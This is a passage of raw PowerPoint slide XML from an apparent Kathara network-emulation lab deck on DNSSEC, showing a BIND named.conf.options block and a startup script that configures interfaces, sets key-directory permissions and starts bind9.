          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1151D67-38D7-7C7E-D99A-D9AEEB688BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2523177" y="2180769"/>
            <a:ext cx="7145435" cy="2298879"/>
            <a:chOff x="332" y="3537"/>
            <a:chExt cx="5943" cy="591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D23F9C6-B1C2-048F-2685-7DCB38535946}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="332" y="3587"/>
              <a:ext cx="5943" cy="541"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/bind";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    key-directory "/var/cache/bind/keys";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-recursion { 110.0.0.0/24; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-validation no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    listen-on-v6 { none; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FEC78D-B4E9-0E78-DDD3-00E2558F4022}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="409" y="3537"/>
              <a:ext cx="3640" cy="99"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6EA61E-A860-05C7-C2A6-B6223328E76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266663EA-41DA-3261-9050-17F3A496E4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAFD6D47-4732-B971-C33D-3983E2C5BEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216843515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4D4D44-110E-7039-FA49-9CD6345AA93F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C878485C-8710-11E3-F8C2-42754D2F26C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2422827" y="2290299"/>
            <a:ext cx="7346346" cy="2277401"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="802"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988A536B-3D94-5BBF-C48A-2D9D24284396}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="744"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 110.0.0.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB465F44-25A5-6269-4E47-6AB704D2A1F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsuni.startup</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B714970-D818-4193-4391-B6FC749D340C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{137DE5BD-9ECE-CFD0-AA39-B69DD70D5862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAA93E7F-151A-6D20-56C1-D46F4A278780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123346314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A1A4D5-B984-61B0-A5F3-632986CE3E7A}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83488E62-FD3A-A5C0-07F1-2F6964996968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1259634"/>
            <a:ext cx="9164577" cy="3026388"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="7128" cy="964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F12A0D-4A9D-46DC-035E-289DF57F3C4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="7128" cy="906"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
